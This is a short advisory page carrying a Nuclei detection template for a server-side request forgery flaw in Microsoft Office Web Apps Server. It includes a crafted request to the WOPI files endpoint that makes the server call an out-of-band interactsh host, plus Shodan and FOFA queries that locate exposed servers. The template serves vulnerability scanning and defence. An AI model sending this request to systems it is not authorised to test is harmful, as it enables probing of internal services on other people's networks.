office-webapps-ssrf: Office Web Apps Server Full Read - Server Side Request Forgery

2025-08-01 Office Web Apps PoC Public

Description

Office Web Apps Server Full Read is vulnerable to SSRF.

PoC

id: office-webapps-ssrf

info:
  name: Office Web Apps Server Full Read - Server Side Request Forgery
  author: DhiyaneshDK
  severity: high
  description: Office Web Apps Server Full Read is vulnerable to SSRF.
  reference:
    - https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view (Slide 37,38)
  classification:
    cpe: cpe:2.3:a:microsoft:office_web_apps_server:*:*:*:*:*:*:*:*
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Provide a link that opens Word"
    fofa-query: body="Provide a link that opens Word"
    product: office_web_apps_server
    vendor: microsoft
  tags: microsoft,office-webapps,redirect,vuln
variables:
  oast: "{{interactsh-url}}"
  string: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |
        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://oast.pro%26status=302&access_token_ttl=0 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')
          - contains(body,'<h1> Interactsh Server </h1>')
          - status_code == 200
        condition: and
# digest: 490a00463044022060390a931f2b6f003e0efd99ece03740ce6519240edf40ad695d49ae0fc337a30220545330977ef0f06981b3f02705d9036a5ffa48d1046bac5a5aa738bd5bb5e71f:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities